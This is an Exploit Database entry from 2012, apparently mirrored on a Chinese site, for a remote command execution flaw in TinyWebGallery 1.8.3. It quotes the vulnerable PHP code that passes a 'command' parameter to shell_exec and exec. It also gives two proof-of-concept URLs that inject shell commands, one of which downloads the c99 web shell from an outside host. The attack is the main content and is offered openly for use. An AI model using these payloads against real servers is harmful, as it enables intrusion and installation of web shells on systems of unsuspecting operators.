TinyWebGallery 1.8.3 – Remote Command Execution

• Exploit Database
• 140 阅读

• 作者： Expl0!Ts
  日期： 2012-01-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18322/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77

  <======================================================> [»]TinyWebGallery 1.8.3 Remote Command Execution <======================================================>     [»]---> Date : 05- 01- 2012 [»]---> Author :Expl0!Ts --------> My Best t34m ----->"BaC , RoBert MilEs , Bl4ck_ID" [»]---> Software Link :http://www.tinywebgallery.com/dl.php?file=twg_latest [»]---> Version:n/a [»]---> Category:php [»]---> Tested on:wind xp   !----- >THnKs T0 My ALLAH <::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::> bIG tHnkS T0 :-> vbspiders.com & Dz4all.com & isecur1ty.org <::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::> <=================Exploit====================> -=[ vuln c0de ]=- 1     1)--------------> filefunctions.inc :   function execute_command ($command) { global $use_shell_exec; ob_start(); set_error_handler("on_error_no_output"); i f (substr(@php_uname(), 0, 7) == "Windows"){ // Make a new instance of the COM object $WshShell = new COM("WScript.Shell"); // Make the command window but dont show it. $oExec = $WshShell->Run("cmd /C " . $command, 0, true); } else { if ($use_shell_exec) { shell_exec($command);<--------------------------------------------- error           1)---------> PoC :     http://127.0.0.1/(patch)/inc/filefunctions.inc?command=<id>;<pwd>;<wget http://shell.org/c99.zip>         -=[ vuln c0de ]=- 2     2) --------------> ifo.php :   if ($use_shell_exec) {   shell_exec($command);   } else { exec($command . " > /dev/null");<------------------------------------------ error     2)---------> PoC :   http://127.0.0.1/(patch)/info.php?command=<id>;<pwd>;<wget http://shell.org/c99.zip>     <-------------------------------------------------------------------------------------------------------------------------------------------------------------------> Gr33tz : !> BaC ,!>Black_ID,!>Kala$nikoV ,!>Robert miles,!>Dr.Black_ID, !> AHmEd-HaMaImi , Bel-AiSa , To-KhAlEd <------------------------------------------------------------------------------------------------------------------------------------------------------------------->     EnJoY o_O